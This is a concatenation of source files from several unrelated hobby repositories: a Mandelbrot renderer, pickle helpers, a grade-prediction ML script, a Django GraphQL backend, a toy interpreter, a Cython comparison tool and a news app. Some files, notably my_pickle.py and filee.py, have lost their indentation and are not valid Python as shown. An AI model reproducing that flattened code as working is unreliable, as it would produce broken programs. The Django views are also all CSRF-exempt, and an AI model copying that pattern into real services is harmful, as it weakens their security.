        processes_num = 8  # number of processes used in multiprocessing
        mode = 2  # 1: calculate the whole image,
        # 2: calculate only the mirror half; only affects performance
# h1,v1 = 50,50
myar = funccol(qual, mode, processes_num) # multiprocessing
img = myar_to_img(myar, (255, 255, 255), (0, 0, 0), mode)
end_0 = time.time() - start_0
print(end_0, "sec")
# cv.namedWindow ( "b" , cv.WINDOW_NORMAL)
cv.imshow(f"mon_img_{qual}", img)
cv.imwrite(f"mon_img_{qual}.png", img)
cv.waitKey(0)
cv.destroyAllWindows()
```
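A quick sanity check of the overflow-based escape test, assuming the script is importable as `offic` (the `__main__` guard keeps the rendering loop from running on import).
```python
from offic import mon

assert mon(0.0, 0.0) is True    # c = 0 stays bounded, no OverflowError
assert mon(2.0, 2.0) is False   # far outside the set, iteration overflows quickly
```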
#### File: mondebrot_painter/2020/my_pickle.py
```python
import os
import pickle
def dump(name, value, end=".pickle"):
full_name = check_name(name, end)
create(name)
with open(full_name, "wb") as file:
pickle.dump(value, file)
return value
def create(name, end=".pickle", only=None):
full_name = check_name(name, end)
# existing test
try:
open(full_name, "xb").close()
except Exception: pass
# filling test
if not file_size(name) > 0:
with open(full_name, "wb") as file:
# create main array
if only is None:
pickle.dump([], file)
def load(name, end=".pickle"):
full_name = check_name(name, end)
with open(full_name, 'rb') as file:
return pickle.load(file)
def check_len(name, end=".pickle"):
return len(load(name, end))
def file_size(name, end=".pickle"):
full_name = check_name(name, end)
return os.path.getsize(full_name)
def check_name(name, end):
    # append the file extension only if it is not already present
    if name.endswith(end):
        return name
    else:
        return name + end
``` |
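A round-trip sketch for the helpers above, assuming the module is importable as `my_pickle`; the "points" name is arbitrary.
```python
import my_pickle

my_pickle.dump("points", [1, 2, 3])            # writes points.pickle
assert my_pickle.load("points") == [1, 2, 3]
assert my_pickle.check_len("points") == 3
```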
{
"source": "0dminnimda/NTO_bigdata_2020_final",
"score": 3
} |
#### File: 0dminnimda/NTO_bigdata_2020_final/filee.py
```python
import pandas as pd
# import lightgbm
data = pd.read_csv("X_train.csv", index_col=0)
data["mark"] = pd.read_csv("y_train.csv", index_col=0)["mark"]
stud_info = pd.read_csv("studs_info.csv", index_col=False)
X_validation = pd.read_csv("X_test.csv", index_col=0)
# rename columns
field_map = {
"STD_ID": "stud",
"НАПРАВЛЕНИЕ": "profession",
"ГОД": "year",
"АТТЕСТАЦИЯ": "exam_type",
"ДИСЦИПЛИНА": "discipline",
"КУРС": "course",
"СЕМЕСТР": "semester",
" number": "number",
"Пол": "sex",
"Статус": "state",
"Дата выпуска": "release_date",
"Категория обучения": "category",
"Форма обучения": "study_kind",
"Шифр": "cipher",
"направление (специальность)": "speciality",
" ": "what?",
"Образование": "lvl_of_education",
"Дата выдачи": "issue_date",
"Что именно закончил": "education",
}
data.rename(columns=field_map, inplace=True)
X_validation.rename(columns=field_map, inplace=True)
stud_info.rename(columns=field_map, inplace=True)
stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True)
# stud_info[np.isin(stud_info["number"], range(850, 900))].sort_values(by=["stud"])
# all(stud_info.groupby("speciality")["cipher"].nunique().eq(1))# and
all(stud_info.groupby("cipher")["speciality"].nunique().eq(1))
g = stud_info.groupby("speciality")["cipher"].nunique()
print(g[g != 1])
set(stud_info[stud_info["speciality"] == "Журналистика"]["cipher"])
# 203283
# remove duplicate entries (older ones)
stud_info = stud_info.sort_values(by=["stud", "issue_date"], na_position="first")
stud_info.drop_duplicates(subset=["stud"], keep="last", inplace=True)
import numpy as np
assert len(stud_info[np.isin(stud_info["stud"], stud_info[stud_info.duplicated(subset=["stud"])])]) == 0
# clean up
# for each stud: year == course + const
# for each stud: course == ceil(semester / 2)
# therefore they are noise
fields = ["year", "course"]
data.drop(fields, axis=1, inplace=True)
X_validation.drop(fields, axis=1, inplace=True)
# all nulls and not present in data / validation
stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True)
# for each stud: all number_s are equal
assert all(stud_info.groupby("number")["stud"].nunique().le(1)) and all(stud_info.groupby("stud")["number"].nunique().le(1))
fields = ["number", "issue_date", "release_date"]
stud_info.drop(fields, axis=1, inplace=True)
{
# ('НС', 'СР'): 4,
# ('ОСН', 'СР'): 3,
# ('НС', 'СП'): 5,
# ('СР', 'СП'): 111,
# ('ОСН', 'СП'): 24,
# ('ОО', 'СР'): 22,
# ('ОО', 'СП'): 131,
('НП', 'СР'): 1,
('НП', 'СП'): 10,
('СП', 'СП'): 7,
('СР', 'СР', 'СП'): 1,
('СР', 'СР'): 1,
('СП', 'СР'): 1,
('СП', 'НП'): 1}
# ('ОО', 'СР' )
# ( 'СР', 'СП')
# ('ОО', 'СП')
# ('ОО', 'СР', 'СП')
# ( 'ОСН', 'СР' )
# ( 'ОСН', 'СП' )
('ОО', 'ОСН', 'СР', 'СП')
('НС', 'СР' )
('НС', 'СП')
# # SeriesGroupBy.cummax()
stud_info
stud_info.fillna({"lvl_of_education": "НЕТ", "what?": 0.0}, inplace=True)
data = data.merge(stud_info, how="left", on="stud")
X_validation = X_validation.merge(stud_info, how="left", on="stud")
data
# encode labels
from sklearn import preprocessing
fields = ["discipline", "profession", "exam_type", "sex", "category", "speciality", "education", "state", "cipher"]
le_s = {
field_name: preprocessing.LabelEncoder().fit(pd.concat([data[field_name], X_validation[field_name]]))
for field_name in fields}
order = [
"НЕТ", # 190 Нет данных
"ОО", # 160 Начальное общее образование
"ОСН", # 32 Основное общее образование
"НС", # 14 Неполное среднее образование
"СР", # 4101 Среднее общее образование
"НВ", # 2 Неполное высшее образование
"НП", # 50 Начальное/Незаконченное? профессиональное образование
"СП", # 916 Среднее профессиональное образование
]
le_s["lvl_of_education"] = preprocessing.LabelEncoder().fit(order)
order = ["В", "Д", "З"] # вечернее, дневное, заочное
le_s["study_kind"] = preprocessing.LabelEncoder().fit(order)
for field_name, le in le_s.items():
data[field_name] = le.transform(data[field_name])
X_validation[field_name] = le.transform(X_validation[field_name])
# 69.0 to 69
fields = ["semester", "what?"]
for field_name in fields:
data[field_name] = data[field_name].astype(int)
X_validation[field_name] = X_validation[field_name].astype(int)
# normalize
data["semester"] -= 1
X_validation["semester"] -= 1
data
# means
fields = ["stud", "profession", "discipline", "speciality", "education", "cipher"]
for field_name in fields:
mean_mark = data.groupby(field_name).mean()["mark"]
mean_name = field_name + "_mean"
data[mean_name] = data[field_name].map(mean_mark)
X_validation[mean_name] = X_validation[field_name].map(mean_mark)
# create dummy variables
columns = []#"exam_type"]#, "discipline", "profession"]
data = pd.get_dummies(data, columns=columns)
X_validation = pd.get_dummies(X_validation, columns=columns)
# remove unneeded data
# use previous fields
# fields = ["stud", "discipline", "profession"]
data.drop(fields, axis=1, inplace=True)
X_validation.drop(fields, axis=1, inplace=True)
data
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
marks = data.pop("mark")
X_train, X_test, y_train, y_test = train_test_split(data, marks, shuffle=True, test_size=0.2)
import autosklearn.classification
import autosklearn.metrics
from get_config import config
import time
automl = autosklearn.classification.AutoSklearnClassifier(metric=autosklearn.metrics.mean_absolute_error, logging_config=config)
print("start", time.time())
automl.fit(X_train, y_train)
print(time.time())
def p():
print(automl.cv_results_)
print(automl)
print({name: getattr(automl, name) for name in dir(automl)})
p()
# parameters = {
# # LGBMRegressor(min_child_samples=1, min_child_weight=1.0, n_estimators=1000,
# # num_leaves=50, random_state=42, reg_alpha=1.0, reg_lambda=1.0))
# 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',),
# 'num_leaves': [2, 15, 31],
# "n_estimators": np.linspace(1, 1000, 4, dtype=int),
# # "min_split_gain": np.linspace(0, 1, 4),
# # "min_child_weight": [1e-3, 1.],
# # "min_child_samples": [1, 30],
# "reg_alpha": np.linspace(0, 1, 4),
# "reg_lambda": np.linspace(0, 1, 4),
# }
# parameters = {
# 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',),
# 'num_leaves': [1, 50],
# "n_estimators": [1, 1000],
# "min_split_gain": [0., 1.],
# "min_child_weight": [1e-3, 1.],
# "min_child_samples": [1, 30],
# "reg_alpha": [0., 1.],
# "reg_lambda": [0., 1.],
# }
# clf = GridSearchCV(lightgbm.LGBMRegressor(random_state=42), parameters, verbose=3, cv=2, scoring='neg_mean_absolute_error') # n_jobs=10,
# clf.fit(X_train, y_train)
# print(clf.cv_results_)
# print(clf.best_estimator_)
from sklearn.metrics import mean_absolute_error, r2_score
pred_mark = automl.predict(X_test)
print(mean_absolute_error(y_test, pred_mark))
print(r2_score(y_test, pred_mark))
print("gg", time.time())
automl.fit(data, marks)
print(time.time())
p()
y_pred = pd.read_csv("sample_submission.csv", index_col=0)
y_pred["mark"] = automl.predict(X_validation)
y_pred.to_csv("baseline_submission.csv")
# I was here
``` |
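A synthetic toy illustration, not from the original notebook, of the mean-mark ("target mean") encoding used in the feature-engineering step above.
```python
import pandas as pd

toy = pd.DataFrame({"stud": [1, 1, 2], "mark": [3, 5, 4]})
toy["stud_mean"] = toy["stud"].map(toy.groupby("stud")["mark"].mean())
print(toy)
#    stud  mark  stud_mean
# 0     1     3        4.0
# 1     1     5        4.0
# 2     2     4        4.0
```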
{
"source": "0dminnimda/NTO_fintech_2022_final",
"score": 2
} |
#### File: backend/sugomA/urls.py
```python
import json
from typing import cast
from ariadne.constants import DATA_TYPE_JSON, DATA_TYPE_MULTIPART
from ariadne.exceptions import HttpBadRequestError
from ariadne.file_uploads import combine_multipart_data
from ariadne.graphql import graphql_sync
from django.conf import settings
from django.contrib import admin
from django.http import HttpRequest, HttpResponseBadRequest, JsonResponse
from django.shortcuts import render
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from graphql import GraphQLSchema
from .exceptions import error_formatter
from .AmogusApp.views import check, home
from .schema import code_smell, schema
def extract_data_from_request(request: HttpRequest):
content_type = request.content_type or ""
content_type = content_type.split(";")[0]
if content_type == DATA_TYPE_JSON:
try:
return json.loads(request.body)
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request body is not a valid JSON") from ex
if content_type == DATA_TYPE_MULTIPART:
try:
operations = json.loads(request.POST.get("operations", "{}"))
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request 'operations' multipart field is not a valid JSON") from ex
try:
files_map = json.loads(request.POST.get("map", "{}"))
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request 'map' multipart field is not a valid JSON") from ex
return combine_multipart_data(operations, files_map, request.FILES)
raise HttpBadRequestError(
"Posted content must be of type {} or {}".format(
DATA_TYPE_JSON, DATA_TYPE_MULTIPART))
def get_context_for_request(context_value, request: HttpRequest):
if callable(context_value):
return context_value(request)
return context_value or {"request": request}
def get_extensions_for_request(extensions, request: HttpRequest, context):
if callable(extensions):
return extensions(request, context)
return extensions
def get_kwargs_graphql(request: HttpRequest) -> dict:
context_value = get_context_for_request(None, request)
extensions = get_extensions_for_request(None, request, context_value)
# http_method_names = ["get", "post", "options"]
# template_name = "ariadne_django/graphql_playground.html"
# playground_options: Optional[dict] = None
# schema: Optional[GraphQLSchema] = None
return {
"context_value": context_value,
"root_value": None,
"validation_rules": None,
"debug": settings.DEBUG,
"introspection": True,
"logger": None,
"error_formatter": error_formatter,
"extensions": extensions,
"middleware": None,
}
@csrf_exempt
def graphql_view(request: HttpRequest):
if request.method == "GET":
return render(request, "home.html")
try:
data = extract_data_from_request(request)
except HttpBadRequestError as error:
return HttpResponseBadRequest(error.message)
print("\n" + "#"*5, "request", data)
code_smell.storage = request.COOKIES
success, result = graphql_sync(
cast(GraphQLSchema, schema), data, **get_kwargs_graphql(request))
status_code = 200 if success else 400
if code_smell["requested_auth"] > 0:
code_smell["requested_auth"] -= 1
response = JsonResponse(result, status=status_code)
print("#"*5, "response", result)
for n, v in code_smell.storage.items():
response.set_cookie(n, v)
return response
@csrf_exempt
def rooms_view(request: HttpRequest):
return render(request, "rooms.html")
@csrf_exempt
def rooms_create_view(request: HttpRequest):
return render(request, "rooms_create.html")
@csrf_exempt
def room_view(request: HttpRequest, room_id):
print('ROOM:', room_id)
return render(request, "room.html")
urlpatterns = [
path("", csrf_exempt(home)),
path("admin/", admin.site.urls),
path('graphql', graphql_view, name='graphql'),
path('rooms', rooms_view),
path('rooms/create', rooms_create_view),
path('room/<int:room_id>', room_view),
path("check", csrf_exempt(check)),
]
``` |
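A hedged client-side sketch (host, port and query are hypothetical): a plain JSON POST is what `extract_data_from_request` above accepts for `DATA_TYPE_JSON`.
```python
import json
import urllib.request

payload = json.dumps({"query": "{ __typename }"}).encode()
request = urllib.request.Request(
    "http://localhost:8000/graphql",
    data=payload,
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(request) as response:
    print(json.load(response))
```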
{
"source": "0dminnimda/PyBEX",
"score": 3
} |
#### File: PyBEX/pybex/classes.py
```python
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, Dict, List, Optional, Type, TypeVar, Union
# Interpretation
@dataclass
class Scope:
namespace: Dict[str, "Expr"] = field(
default_factory=dict)
def update_by_scope(self, scope: "Scope") -> None:
self.namespace.update(scope.namespace)
@classmethod
def from_funcions(cls, *funcions: "Function"):
return cls({
func.name: func
for func in funcions
})
class EvalContext:
scopes: List[Scope]
last_funcall: Optional["Funcall"]
def __init__(self, scope: Optional[Scope] = None):
if scope is None:
scope = Scope()
self.scopes = [scope]
self.last_funcall = None
@property
def scope(self) -> Scope:
return self.scopes[-1]
def add_scope(self, scope: Scope) -> None:
self.scopes.append(scope)
def add_new_scope(self) -> None:
self.add_scope(Scope())
def pop_scope(self) -> None:
        if len(self.scopes) <= 1:
            raise RuntimeError("Cannot remove the last remaining scope, "
                               "there always should be at least one left")
del self.scopes[-1]
# AST
class Expr:
pass
@dataclass
class Program:
body: List[Expr]
@dataclass
class Number(Expr):
value: Union[int, float]
def __repr__(self):
return repr(self.value)
def __str__(self):
return str(self.value)
@dataclass
class String(Expr):
value: str
def __repr__(self):
return repr(self.value)
def __str__(self):
return self.value
@dataclass
class Word(Expr):
value: str
@dataclass
class Funcall(Expr):
name: str
args: List[Expr]
PyFunctionT = Callable[[EvalContext, List[Expr]], Expr]
FuncT = TypeVar("FuncT", bound="Function")
@dataclass
class Function(Expr):
name: str
_func: PyFunctionT
@classmethod
def named_py(cls: Type[FuncT],
name: str) -> Callable[[PyFunctionT], FuncT]:
return partial(cls, name)
@classmethod
def py(cls: Type[FuncT], func: PyFunctionT) -> FuncT:
return cls(func.__name__[4:], func)
# too dynamic for type checkers:
# @classmethod
# def py(
# cls: Type[FuncT], arg1: Union[PyFunctionT, str]
# ) -> Union[FuncT, Callable[[PyFunctionT], FuncT]]:
# if isinstance(arg1, str):
# return partial(cls, arg1)
# return cls(arg1.__name__, arg1)
def __call__(self, ctx: EvalContext, exprs: List[Expr]) -> Expr:
return self._func(ctx, exprs)
def __repr__(self):
return f"Function(name={self.name!r})"
# AST/code Constants
class NothingType(Expr):
def __repr__(self):
return "Nothing"
Nothing = NothingType()
class UnfinishedType(Expr):
pass
Unfinished = UnfinishedType()
```
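A hedged sketch of registering a Python-backed function and calling it by hand, bypassing the parser; the import path follows the file layout, and `Function.py` strips the `bex_` prefix from the wrapped name.
```python
from pybex.classes import EvalContext, Function, Number, Scope

@Function.py
def bex_add(ctx: EvalContext, exprs):
    # assumes every argument has already been evaluated to a Number
    return Number(sum(e.value for e in exprs))

ctx = EvalContext(Scope.from_funcions(bex_add))
result = ctx.scope.namespace["add"](ctx, [Number(1), Number(2)])
assert result.value == 3
```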
#### File: PyBEX/pybex/parser.py
```python
import ast
from dataclasses import dataclass
from lark import Lark, Transformer
from .classes import Funcall, Number, Program, String, Unfinished, Word
@dataclass
class BEXTransformer(Transformer):
interactive: bool
def int(self, items):
return Number(int(items[0].value))
def float(self, items):
return Number(float(items[0].value))
def string(self, items):
return String(ast.literal_eval(items[0].value))
def unfinished_string(self, items):
if self.interactive:
return Unfinished
# TODO: pretty parsing errors
raise SyntaxError("unterminated triple-quoted string literal")
def word(self, items):
return Word(items[0].value)
def funcall(self, items):
return Funcall(items[0].value, items[1:])
def unfinished_call(self, items):
if self.interactive:
return Unfinished
# TODO: pretty parsing errors
raise SyntaxError("unexpected EOF while parsing")
def exec_input(self, items):
return Program(items)
def single_input(self, items):
return Program(items)
_transformer = BEXTransformer(False)
_parser = Lark.open(
"grammar.lark", parser="lalr", transformer=_transformer,
start=["single_input", "exec_input"], rel_to=__file__,
# priority="invert"
# debug=True,
# propagate_positions=True,
)
# with open(os.path.join(os.path.dirname(__file__), )) as f:
# PARSER = Lark(f)
# del f
def parse_source(source: str, mode: str = "exec") -> Program:
if mode == "exec":
_transformer.interactive = False
start = "exec_input"
# method = _parser.parse
# elif mode == "eval":
# _transformer.interactive = False
# start = "expr"
elif mode == "single":
_transformer.interactive = True
start = "single_input"
# method = _parser.parse_interactive
else:
raise ValueError("`mode` must be 'exec'"
# ", 'eval'"
" or 'single'")
return _parser.parse(source, start=start) # type: ignore
# def parse_file(path: str, mode: str = "exec") -> Program:
# with open(path) as f:
# return parse_source(f.read(), mode)
``` |
{
"source": "0dminnimda/translation_comparator",
"score": 2
} |
#### File: examples/cython/array.py
```python
import cython
def test():
p: cython.int[1000] = [0] * 1000
p[0] = 100
```
#### File: translation_comparator/cython/annotated_html_parser.py
```python
import re
from pathlib import Path
from typing import List, Tuple
from bs4 import BeautifulSoup, FeatureNotFound
from bs4.element import Tag
def get_code_from_soup(soup: BeautifulSoup) -> List[str]:
return [
tag.text for tag in soup.find_all("pre", class_="code")]
def get_soup_from_html(path: Path) -> BeautifulSoup:
html = path.with_suffix(".html").read_text()
html = html.replace(path.stem, "{fname}")
html = html.replace(path.stem[:-1], "{fname}")
html = re.sub(r"\d+{fname}", "{num_fname}", html)
html = html.replace("{fname}" + "_" + path.suffix[1:],
"{fname_suf}")
try:
return BeautifulSoup(html, "lxml")
except FeatureNotFound:
try:
return BeautifulSoup(html, "html5lib")
except FeatureNotFound:
return BeautifulSoup(html, "html.parser")
def get_code_from_two_files_by_path(
path1: Path, path2: Path
) -> Tuple[List[str], List[str]]:
return (
get_code_from_soup(get_soup_from_html(path1)),
get_code_from_soup(get_soup_from_html(path2)))
def get_code_from_two_files(
file1: str, file2: str
) -> Tuple[List[str], List[str]]:
return get_code_from_two_files_by_path(
Path(file1), Path(file2))
```
#### File: translation_comparator/cython/with_cython.py
```python
from pathlib import Path
from typing import Iterable
from Cython.Build import cythonize
from ..comparison_helpers import compare_cythonized
from ..pair_finders import pairs_and_extentions_for_cython
from . import settings
def cythonize_paths(paths: Iterable[Path], **kwargs) -> None:
if "module_list" in kwargs:
raise ValueError("module_list should not be present")
kwargs.update(build_dir=str(settings.build_dir), annotate=True)
cythonize(list(map(str, paths)), **kwargs)
def cythonize_and_compare(*patterns: str, **kwargs):
pairs, py_paths, pyx_paths = pairs_and_extentions_for_cython(*patterns)
build_dir = settings.build_dir
settings.build_dir = build_dir.joinpath(settings.py_dir) # dirty singleton
cythonize_paths(py_paths, **kwargs)
settings.build_dir = build_dir.joinpath(settings.pyx_dir)
cythonize_paths(pyx_paths, **kwargs)
settings.build_dir = build_dir
compare_cythonized(pairs)
```
#### File: translation_comparator/translation_comparator/pair_finders.py
```python
from distutils.extension import Extension
from pathlib import Path
from typing import Collection, Iterable, Iterator, List, Optional, Set, Tuple
from .cython import settings as cython_settings
from .path_helpers import full_path, relative_to_cwd, self_glob, with_parent
from .typedefs import GEN_PATH_FUNC
def includes_excludes_from_patterns(
*patterns: str
) -> Tuple[List[Path], List[Path]]:
includes, excludes = [], []
for pattern in patterns:
if pattern[:2] == "\\!":
excludes.append(full_path(
Path(pattern[2:])))
else:
includes.append(full_path(
Path(pattern)))
return includes, excludes
def no_matches(path: Path, patterns: Collection[Path]) -> bool:
for pattern in patterns:
if path.match(str(pattern)):
return False
return True
def matching_paths(
includes: Iterable[Path], excludes: Collection[Path],
) -> Iterator[Path]:
for path in includes:
for match in self_glob(path):
if no_matches(match, excludes):
yield match
def paths_for_cython(*patterns: str) -> Iterator[Path]:
# if returned is None:
returned: Set[str] = set()
includes, excludes = includes_excludes_from_patterns(*patterns)
extensions = cython_settings.extensions
for path in matching_paths(includes, excludes):
if path.suffix in extensions and path.name not in returned:
yield path
returned.add(path.name)
def pairs_and_extentions_for_cython(
*patterns: str
) -> Tuple[List[Tuple[Path, Path]], List[Path], List[Path]]:
pairs: List[Tuple[Path, Path]] = []
py_paths: List[Path] = []
pyx_paths: List[Path] = []
path_func = cython_settings.path_func
build_dir = cython_settings.build_dir
for path in paths_for_cython(*patterns):
path1, path2 = path_func(path)
path1 = relative_to_cwd(path1)
path2 = relative_to_cwd(path2)
new_path1 = with_parent(path1, cython_settings.py_dir)
new_path2 = with_parent(path2, cython_settings.pyx_dir)
py_paths.append(path1)
pyx_paths.append(path2)
pairs.append((
cython_settings.build_dir.joinpath(new_path1),
cython_settings.build_dir.joinpath(new_path2)))
return pairs, py_paths, pyx_paths
```
#### File: translation_comparator/translation_comparator/path_helpers.py
```python
from glob import iglob
from pathlib import Path
from typing import Iterator, Tuple
from .cython import settings as cython_settings
def self_glob(path: Path) -> Iterator[Path]:
for string in iglob(str(path)):
yield Path(string)
def full_path(path: Path) -> Path:
return path.expanduser().absolute()
def relative_to_cwd(path: Path) -> Path:
return path.relative_to(Path.cwd())
def with_parent(path: Path, directory: Path) -> Path:
return directory.joinpath(path.name)
def change_same_paths_if_needed(path1: Path, path2: Path) -> Tuple[Path, Path]:
if path1.stem == path2.stem:
return (cython_settings.unique_stem_func(path1),
cython_settings.unique_stem_func(path2))
if path1.name == path2.name:
return cython_settings.unique_name_func(path1)
return (path1, path2)
``` |
{
"source": "0dysseas/news-indicator",
"score": 3
} |
#### File: news-indicator/newsindicator/utils.py
```python
import json
import os
def print_json_object(obj):
"""
A JSON print helper function.
"""
print ('Printing JSON object')
print (json.dumps(obj, indent=4))
def get_asset(asset='sources'):
"""
Gets the assets from the specified folder.
"""
absolute_path = os.path.dirname(os.path.abspath(__file__))
if asset is not 'sources':
return os.path.join(absolute_path, 'assets/news_icon.png')
return os.path.join(absolute_path, 'assets/news_sources.txt')
def get_news_sources_from_file():
"""
Gets the news sources from the file.
"""
source_file = get_asset()
with open(source_file, 'r') as f:
news_sources = dict()
for line in f:
if not line.startswith('#') and line.split():
split_line = line.split(' = ')
news_sources[split_line[0]] = split_line[1].rstrip('\n')
return news_sources
def delete_redundant_items(json_news, keys_to_del):
    """
    Deletes the given redundant keys from the news JSON object.
    """
for item in keys_to_del:
del json_news[item]
return json_news
``` |
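A format sketch (entries are hypothetical) for the `assets/news_sources.txt` file parsed above: one `name = url` pair per line, with `#`-prefixed and blank lines skipped; the import path assumes the layout in the file header.
```python
#   # comment lines are ignored
#   bbc-news = http://example.com/bbc-feed
#   techcrunch = http://example.com/techcrunch-feed
from newsindicator.utils import get_news_sources_from_file

for name, url in get_news_sources_from_file().items():
    print(name, "->", url)
```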
{
"source": "0dysseas/news",
"score": 2
} |
#### File: news_backend/core/models.py
```python
from django.db import models
class Article(models.Model):
title = models.TextField(blank=False, default='Enter the article title here...')
subHeader = models.TextField(blank=True)
journalistName = models.TextField(blank=True)
content = models.TextField(blank=False, default='Enter the article content here...')
topic = models.TextField(blank=False, default='Enter the article topic here...')
timeOfPublish = models.DateField(blank=False, null=True)
# tags = ArrayField(models.CharField(max_length=250), blank=True, null=True)
# TODO: Add image field
def __str__(self):
return '{article} by {journalist} written on {date}'.format(article=self.title,
journalist=self.journalistName,
date=self.timeOfPublish)
```
#### File: core/tests/test_views.py
```python
from ..models import Article
from ..serializers import ArticleSerializer
from rest_framework import status
from django.test import TestCase
from rest_framework.test import APIClient
client = APIClient()
class GetAllArticlesTest(TestCase):
"""
Test class for GET /articles
"""
def setUp(self):
Article.objects.create(id=1, content='The US impeachment inquiry emerges from behind closed doors at last.'
'more than a month, the process - which could end in a Senate vote on '
'Donald Trump\'s removal from office - has been shrouded in mystery.The '
'biggest revelations have come from leaks, anonymous media reports and '
'voluminous deposition transcripts where even the most explosive and '
'revealing moments can be drained of drama when presented on the written'
'page. That all changes on Wednesday. Here are four things to keep in '
'mind as the lights go up and the cameras turn on in the House '
'Intelligence Committee hearing room.',
journalistName='<NAME>', timeOfPublish='2019-11-13',
subHeader='The US impeachment inquiry emerges from behind closed doors at last.For more '
'than a month, the process - which could end in a Senate vote on Donald '
'Trump\'s removal from office - has been shrouded in mystery.',
title='Trump impeachment inquiry', topic='World News')
Article.objects.create(id=2, content='The recent flooding in Venice was caused by a combination of high spring '
'tides and a meteorological storm surge driven by strong sirocco winds '
'blowing north-eastwards across the Adriatic Sea. '
'When these two events'
'coincide, we get what is known as Acqua Alta (high water).This latest '
'Acqua Alta occurrence in Venice is the second highest tide in recorded '
'history. However, if we look at the top 10 tides, five have occurred in '
'the past 20 years and the most recent was only last year. While we should'
'try to avoid attributing a single event to climate change, the increased '
'frequency of these exceptional tides is obviously a big concern. In our '
'changing climate, sea levels are rising and a city such as Venice, which '
'is also sinking, is particularly susceptible to such changes. The weather'
'patterns that have caused the Adriatic storm surge have been driven by a '
'strong meridional (waving) jet stream across the northern hemisphere and '
'this has fed a conveyor belt of low pressure systems into the central '
'Mediterranean.One of the possible effects of a changing climate is that '
'the jet stream will be more frequently meridional and blocked weather '
'patterns such as these will also become more frequent. If this happens, '
'there is a greater likelihood that these events will combine with '
'astronomical spring tides and hence increase the chance of flooding in '
'Venice. Furthermore, the meridional jet stream can be linked back to '
'stronger typhoons in the north-west Pacific resulting in more frequent '
'cold outbreaks in North America and an unsettled Mediterranean is another'
'one of the downstream effects.', journalistName='<NAME>',
timeOfPublish='2019-11-12', subHeader='The recent flooding in Venice was caused by a '
'combination of high spring tides and a '
'meteorological storm surge driven by strong '
'sirocco winds blowing north-eastwards across the '
'Adriatic Sea.', title='Is climate change behind '
'Venice Flooding?',
topic='Top News, World News')
Article.objects.create(id=3, content='Fuelled by rising international interest in why the Nordic countries are '
'doing so well, three of the region’s top universities recently joined '
'forces to launch the world’s first international master’s programme '
'specialising in Nordic urban planning. Taught in English, it is a '
'collaboration between Pinder’s team at Roskilde University, west of '
'Copenhagen, researchers at Malmö University in southern Sweden and The '
'Arctic University of Norway in Tromsø, 200 miles north of the Arctic '
'circle. The first 32 students began the course in September and will each '
'spend at least one semester in every location during the two-year '
'programme.\“I have been travelling around the Nordics and I was very '
'impressed by the green spaces, architecture which combines aesthetics and'
' utility, and mobility in urban spaces,\” says <NAME>, 32, an '
'urban planner from Paris. He signed up to get a \“fresh gaze\” on his '
'profession, but the multidisciplinary course has also attracted '
'participants from Europe and North America with a diverse range of '
'backgrounds, as well as graduates in urban planning or people who have '
'spent time working in the sector. In the Nordics, a strong rail '
'infrastructure connects most major cities, long-distance trains and buses '
'are typically equipped with WiFi, and commuters can usually avoid driving '
'to work \“There are so many places that can learn from Nordic perspectives'
' on planning,” argues <NAME>, a 27-year-old Danish student'
' taking the course. “I recently went to the US and travelled around the '
'southern part. In Nashville, it was almost impossible getting around '
'without a car and it was even difficult travelling between cities. Going '
'on a bus [in the US], it was clear that it was mostly people from a '
'specific socioeconomic background who took the bus.\” In the Nordics, a '
'strong rail infrastructure connects most major cities, long-distance '
'trains and buses are typically equipped with WiFi, and commuters can '
'usually avoid driving to work. Of course, Nordic countries are much '
'smaller than North America and have fewer large urban hubs, which means a'
' direct comparison is difficult. Yet Mikkelsen says the experience made '
'her keenly aware of the benefits of investing in public transport. \“I '
'realised it is very clear how quickly you accommodate yourself to living '
'in a liveable city. I am so used to being able to walk or cycle '
'everywhere,\” she reflects.',
journalistName='<NAME>', timeOfPublish='2019-11-12',
subHeader='Scandinavia is famous for its liveable cities, but a new university course '
'in Nordic urban planning has raised questions about replicating the region’s '
'approach elsewhere.',
title='What the Nordic nations can teach us about liveable cities', topic='World News')
Article.objects.create(id=4, content='A national culture that supports spending time alone as well as with '
'friends is also something he values, alongside Finland’s ample nature and'
' low unemployment levels. “There’s a lot of jobs...if one is ready to '
'apply and search for a job, then I think everyone can get a job,” '
'he argues.', journalistName='<NAME>',
timeOfPublish='2019-11-13', subHeader='Finland regularly tops global rankings as the '
'happiest nation on the planet, but this brings a '
'unique set of challenges for young people '
'struggling with depression.',
title='Being depressed in the \'world\'s happiest country\'',
topic='Top News, World News')
def test_get_all_articles(self):
# get API response
response = client.get('http://192.168.1.3:8000/api/v1/articles/')
# get data from db
articles = Article.objects.all()
serializer = ArticleSerializer(articles, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
``` |
{
"source": "0e4e6d01/non-parallel-text-style-transfer-using-self-attn-discriminator",
"score": 3
} |
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/classifier_args.py
```python
import argparse
def add_classifier_arguments(parser):
parser.add_argument(
"--num_labels",
type=int,
default=2,
help="number of classes of labels"
)
def add_cnn_classifier_arguments(parser):
parser.add_argument(
"--num_kernels_each_size",
type=int,
default=2,
help="number of kernels of each size"
)
parser.add_argument(
"--kernel_sizes",
type=int,
default=[2, 3, 4],
nargs='+',
help="a list of kernel sizes"
)
def add_rnn_classifier_arguments(parser):
parser.add_argument(
"--enc_num_layers",
type=int,
default=1,
help="number of layer of encoder rnn"
)
parser.add_argument(
"--hidden_size",
type=int,
default=256,
help="hidden size of rnn encoder"
)
parser.add_argument(
"--cell",
type=str,
default="LSTM",
help="lstm or gru"
)
parser.add_argument(
"--enc_bidirectional",
action="store_true",
help="whether encoder is bi-directional"
)
```
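A usage sketch showing how the argument groups above compose onto one shared parser; the import path is assumed from the file header.
```python
import argparse

from classifier.classifier_args import (
    add_classifier_arguments,
    add_rnn_classifier_arguments,
)

parser = argparse.ArgumentParser()
add_classifier_arguments(parser)
add_rnn_classifier_arguments(parser)

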